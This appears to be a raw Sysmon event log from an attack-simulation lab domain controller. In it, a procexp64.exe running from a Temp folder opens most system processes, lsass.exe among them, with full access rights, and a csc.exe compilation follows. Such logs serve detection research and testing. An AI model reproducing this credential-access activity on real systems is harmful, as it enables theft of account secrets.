15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789399Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789398Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789397Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789396Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789395Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789394Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789393Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789392Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789391Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789390Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789389Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789388Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789387Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789386Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789385Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789384Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789383Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789382Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789381Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789380Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789379Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789378Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789377Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789376Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789375Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789374Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789373Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789372Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789371Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789370Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789369Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:34.189{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 11241100x8000000000000000789527Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.localDLL2021-01-26 15:16:35.642{732C744F-3253-6010-CDA2-00000000A301}6556C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeC:\Users\Administrator\AppData\Local\Temp\2\pksi3saf\pksi3saf.dll2021-01-26 15:16:35.548 10341000x8000000000000000789526Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.642{732C744F-31A3-6010-A3A2-00000000A301}64165800C:\Windows\system32\conhost.exe{732C744F-3253-6010-CEA2-00000000A301}7736C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789525Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.642{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789524Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.642{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789523Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:16:35.642{732C744F-151A-600B-0C00-00000000A301}5846780C:\Windows\system32\svchost.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000789522Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 